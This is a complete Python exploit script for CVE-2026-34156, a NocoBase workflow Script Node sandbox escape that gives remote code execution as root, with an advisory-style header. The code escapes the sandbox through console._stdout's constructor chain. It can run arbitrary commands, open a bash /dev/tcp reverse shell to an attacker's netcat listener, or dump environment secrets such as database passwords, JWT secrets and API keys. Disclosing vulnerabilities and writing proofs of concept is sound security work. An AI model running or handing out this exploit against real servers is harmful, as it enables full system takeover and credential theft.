# Exploit Title: NocoBase 2.0.27 - VM Sandbox Escape # Date: 2026-03-26 # Exploit Author: Onurcan Genç # Vendor Homepage: https://www.nocobase.com/ # Software Link: https://github.com/nocobase/nocobase # Version: <= 2.0.27 — patched in 2.0.28 # Tested on: Debian GNU/Linux 12 (bookworm) / Docker / Node.js v20.20.1 # CVE: CVE-2026-34156 # Advisory: https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c # CWE: CWE-913 # CVSS: 9.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) # # Description: # NocoBase's Workflow Script Node executes user-supplied JavaScript inside # a Node.js vm sandbox with a custom require allowlist. However, the console # object passed into the sandbox exposes host-realm WritableWorkerStdio # stream objects (console._stdout / console._stderr). By traversing the # prototype chain (.constructor.constructor), an attacker obtains the host # realm's Function constructor, accesses the process object, and uses # process.mainModule.require to load child_process — bypassing the sandbox # and achieving Remote Code Execution as root. # # Exploitation chain: # console._stdout.constructor.constructor → host-realm Function # Function('return process')() → Node.js process object # process.mainModule.require('child_process') → unrestricted module # child_process.execSync('id') → RCE as root # # Usage: # python3 exploit.py -t -u -P --cmd "id" # python3 exploit.py -t -u -P --dump # python3 exploit.py -t -u -P -l -p # # Notes: # - Requires valid credentials (any user with workflow access) # - Vulnerability check runs automatically before exploitation # - Default reverse shell uses bash /dev/tcp (Debian-based containers) # - Start listener before running: nc -lvnp 4444 import argparse import json import requests import sys import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # ─── Colors ─────────────────────────────────────────────────────────────────── class C: RED = "\033[91m" GREEN = "\033[92m" YELLOW = "\033[93m" BLUE = "\033[94m" MAGENTA = "\033[95m" CYAN = "\033[96m" WHITE = "\033[97m" BOLD = "\033[1m" DIM = "\033[2m" RESET = "\033[0m" def info(msg): print(f" {C.BLUE}[*]{C.RESET} {msg}") def good(msg): print(f" {C.GREEN}[+]{C.RESET} {msg}") def warn(msg): print(f" {C.YELLOW}[!]{C.RESET} {msg}") def fail(msg): print(f" {C.RED}[-]{C.RESET} {msg}") def result(msg): print(f" {C.CYAN}[→]{C.RESET} {msg}") BANNER = f""" {C.RED}{C.BOLD}╔══════════════════════════════════════════════════════════════════╗ ║ NocoBase Workflow Script Node — VM Sandbox Escape to RCE ║ ║ CVE: [CVE-2026-34156] | CVSS: 9.9 Critical ║ ║ Author: Onurcan Genç ║ ╚══════════════════════════════════════════════════════════════════╝{C.RESET} """ ESCAPE_CHAIN = ( "const Fn=console._stdout.constructor.constructor;" "const proc=Fn('return process')();" "const cp=proc.mainModule.require('child_process');" ) # ─── Core Functions ─────────────────────────────────────────────────────────── def authenticate(target: str, username: str, password: str, verify_ssl: bool = False) -> str: url = f"{target.rstrip('/')}/api/auth:signIn" body = {"account": username, "password": password} print() info(f"Authenticating as {C.BOLD}{username}{C.RESET}...") try: resp = requests.post(url, headers={"Content-Type": "application/json"}, json=body, timeout=10, verify=verify_ssl) data = resp.json() except requests.exceptions.ConnectionError: fail(f"Connection failed: cannot reach {C.YELLOW}{url}{C.RESET}") sys.exit(1) except json.JSONDecodeError: fail(f"Invalid response from server") sys.exit(1) if "errors" in data: msg = data["errors"][0].get("message", "Unknown error") fail(f"Authentication failed: {C.RED}{msg}{C.RESET}") sys.exit(1) token = data.get("data", {}).get("token") if not token: fail("No token in response") sys.exit(1) nickname = data.get("data", {}).get("user", {}).get("nickname", "unknown") user_id = data.get("data", {}).get("user", {}).get("id", "?") good(f"Authenticated! User: {C.GREEN}{C.BOLD}{nickname}{C.RESET} (ID: {user_id})") good(f"Token: {C.DIM}{token[:25]}...{token[-10:]}{C.RESET}") return token def send_payload(target: str, token: str, payload: str, verify_ssl: bool = False) -> dict: url = f"{target.rstrip('/')}/api/flow_nodes:test" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } body = { "type": "script", "config": {"content": payload, "timeout": 5000, "arguments": []} } try: resp = requests.post(url, headers=headers, json=body, timeout=10, verify=verify_ssl) return resp.json() except requests.exceptions.Timeout: return {"data": {"status": 1, "result": "timeout (expected for reverse shell)"}} except requests.exceptions.ConnectionError as e: return {"error": f"Connection failed: {e}"} except json.JSONDecodeError: return {"error": "Invalid JSON response", "raw": resp.text[:500]} def verify_vulnerability(target: str, token: str) -> bool: print() print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") info(f"{C.BOLD}Phase 1: Vulnerability Check{C.RESET}") print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") check_payload = ( "try {" " const name = console._stdout.constructor.name;" " const fnType = typeof console._stdout.constructor.constructor;" " return JSON.stringify({stream: name, fnConstructor: fnType});" "} catch(e) { return 'ERR: ' + e.message; }" ) result_data = send_payload(target, token, check_payload) if "error" in result_data: fail(f"Connection error: {result_data['error']}") return False data = result_data.get("data", {}) if data.get("status") != 1: if "INVALID_TOKEN" in str(data) or "EMPTY_TOKEN" in str(data): fail("Authentication token is invalid or expired") else: fail(f"Unexpected response: {data}") return False try: check = json.loads(data.get("result", "{}")) stream = check.get("stream", "") fn_type = check.get("fnConstructor", "") if stream == "WritableWorkerStdio" and fn_type == "function": good(f"Host-realm stream object: {C.GREEN}{C.BOLD}{stream}{C.RESET}") good(f"Function constructor: {C.GREEN}{C.BOLD}accessible{C.RESET}") print() good(f"{C.GREEN}{C.BOLD}TARGET IS VULNERABLE!{C.RESET}") return True else: fail(f"Unexpected sandbox state: stream={stream}, fn={fn_type}") return False except (json.JSONDecodeError, TypeError): res = data.get("result", "") fail(f"Check failed: {res}") return False # ─── Exploit Modes ──────────────────────────────────────────────────────────── def exploit_cmd(target: str, token: str, cmd: str): print() print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") info(f"{C.BOLD}Phase 2: Command Execution{C.RESET}") print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") info(f"Executing: {C.YELLOW}{cmd}{C.RESET}") safe_cmd = cmd.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"') payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();' resp = send_payload(target, token, payload) data = resp.get("data", {}) if data.get("status") == 1: output = data.get("result", "") print() good(f"Output:") print(f" {C.CYAN}{'─' * 55}{C.RESET}") for line in output.split("\n"): print(f" {C.WHITE}{line}{C.RESET}") print(f" {C.CYAN}{'─' * 55}{C.RESET}") else: fail(f"Execution failed: {data}") def exploit_revshell(target: str, token: str, lhost: str, lport: int): print() print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") info(f"{C.BOLD}Phase 2: Reverse Shell{C.RESET}") print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") info(f"Target: {C.YELLOW}{target}{C.RESET}") info(f"Callback: {C.GREEN}{C.BOLD}{lhost}:{lport}{C.RESET}") warn(f"Ensure listener is running: {C.BOLD}nc -lvnp {lport}{C.RESET}") print() shell_cmd = f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"' payload = f"{ESCAPE_CHAIN}cp.exec('{shell_cmd}');return 'shell spawned';" resp = send_payload(target, token, payload) data = resp.get("data", {}) res = data.get("result", "") if "shell spawned" in str(res) or "timeout" in str(res): good(f"{C.GREEN}{C.BOLD}Payload delivered! Check your listener.{C.RESET}") else: fail(f"Unexpected response: {data}") def exploit_dump(target: str, token: str): print() print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") info(f"{C.BOLD}Phase 2: System & Credential Dump{C.RESET}") print(f" {C.MAGENTA}{'─' * 55}{C.RESET}") # System info via shell commands commands = [ ("User", "id"), ("Hostname", "hostname"), ("OS", "cat /etc/os-release | grep PRETTY_NAME | cut -d= -f2"), ("Kernel", "uname -r"), ("Node.js", "node --version"), ("Working Dir", "pwd"), ] print() info(f"{C.BOLD}System Information{C.RESET}") print(f" {C.CYAN}{'─' * 55}{C.RESET}") for label, cmd in commands: safe_cmd = cmd.replace('"', '\\"') payload = f'{ESCAPE_CHAIN}return cp.execSync("{safe_cmd}").toString().trim();' resp = send_payload(target, token, payload) data = resp.get("data", {}) if data.get("status") == 1: out = data.get("result", "N/A").replace('"', '') print(f" {C.WHITE}{label:.<22}{C.RESET} {C.GREEN}{out}{C.RESET}") print(f" {C.CYAN}{'─' * 55}{C.RESET}") # Credentials via JavaScript print() info(f"{C.BOLD}Environment Credentials{C.RESET}") print(f" {C.CYAN}{'─' * 55}{C.RESET}") secrets_payload = ( f"{ESCAPE_CHAIN}" "const env = proc.env;" "const keys = ['DB_HOST','DB_PORT','DB_DATABASE','DB_USER','DB_PASSWORD'," "'DB_DIALECT','INIT_ROOT_USERNAME','INIT_ROOT_PASSWORD','INIT_ROOT_NICKNAME'," "'INIT_ROOT_EMAIL','APP_KEY','API_KEY','JWT_SECRET','SECRET_KEY'];" "const out = {}; keys.forEach(k => { if(env[k]) out[k] = env[k]; });" "return JSON.stringify(out);" ) resp = send_payload(target, token, secrets_payload) data = resp.get("data", {}) if data.get("status") == 1: try: creds = json.loads(data.get("result", "{}")) for k, v in creds.items(): color = C.RED if "PASS" in k or "SECRET" in k or "KEY" in k else C.YELLOW print(f" {C.WHITE}{k:.<30}{C.RESET} {color}{C.BOLD}{v}{C.RESET}") except json.JSONDecodeError: result(f"Raw: {data.get('result')}") print(f" {C.CYAN}{'─' * 55}{C.RESET}") # All env vars with sensitive patterns print() info(f"{C.BOLD}Additional Secrets (pattern match){C.RESET}") print(f" {C.CYAN}{'─' * 55}{C.RESET}") extra_payload = ( f"{ESCAPE_CHAIN}" "const env = proc.env;" "const out = {};" "for (const k of Object.keys(env)) {" " if (/secret|key|token|pass|auth|jwt|api_key|private/i.test(k) && " " !k.startsWith('npm_')) out[k] = env[k];" "}" "return JSON.stringify(out);" ) resp = send_payload(target, token, extra_payload) data = resp.get("data", {}) if data.get("status") == 1: try: extras = json.loads(data.get("result", "{}")) if extras: for k, v in extras.items(): print(f" {C.WHITE}{k:.<30}{C.RESET} {C.RED}{C.BOLD}{v}{C.RESET}") else: info("No additional secrets found") except json.JSONDecodeError: pass print(f" {C.CYAN}{'─' * 55}{C.RESET}") # ─── Main ───────────────────────────────────────────────────────────────────── def main(): print(BANNER) parser = argparse.ArgumentParser( description="NocoBase Workflow Script Node — VM Sandbox Escape to RCE", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=f""" {C.BOLD}Examples:{C.RESET} {C.CYAN}Command:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 --cmd "id" {C.CYAN}Dump:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 --dump {C.CYAN}Reverse Shell:{C.RESET} %(prog)s -t http://target:13000 -u nocobase -P admin123 -l 10.10.14.5 -p 4444 """ ) parser.add_argument("-t", "--target", required=True, help="Target NocoBase URL (e.g., http://target:13000)") parser.add_argument("-u", "--username", required=True, help="NocoBase username") parser.add_argument("-P", "--password", required=True, help="NocoBase password") parser.add_argument("-l", "--lhost", default=None, help="Listener IP for reverse shell") parser.add_argument("-p", "--lport", type=int, default=4444, help="Listener port (default: 4444)") parser.add_argument("--cmd", default=None, help="Execute a single command") parser.add_argument("--dump", action="store_true", help="Dump system info and credentials") parser.add_argument("--no-verify", action="store_true", help="Skip vulnerability verification") args = parser.parse_args() if not args.cmd and not args.lhost and not args.dump: fail(f"Specify {C.BOLD}--cmd{C.RESET} (command), {C.BOLD}--dump{C.RESET} (info), or {C.BOLD}-l LHOST{C.RESET} (revshell)") sys.exit(1) # Phase 0: Authenticate token = authenticate(args.target, args.username, args.password) # Phase 1: Vulnerability check (always runs unless --no-verify) if not args.no_verify: if not verify_vulnerability(args.target, token): fail(f"{C.RED}{C.BOLD}TARGET IS NOT VULNERABLE.{C.RESET} Exiting.") sys.exit(1) # Phase 2: Exploit if args.dump: exploit_dump(args.target, token) elif args.cmd: exploit_cmd(args.target, token, args.cmd) else: exploit_revshell(args.target, token, args.lhost, args.lport) print() print(f" {C.GREEN}{C.BOLD}Done.{C.RESET}") print() if __name__ == "__main__": main()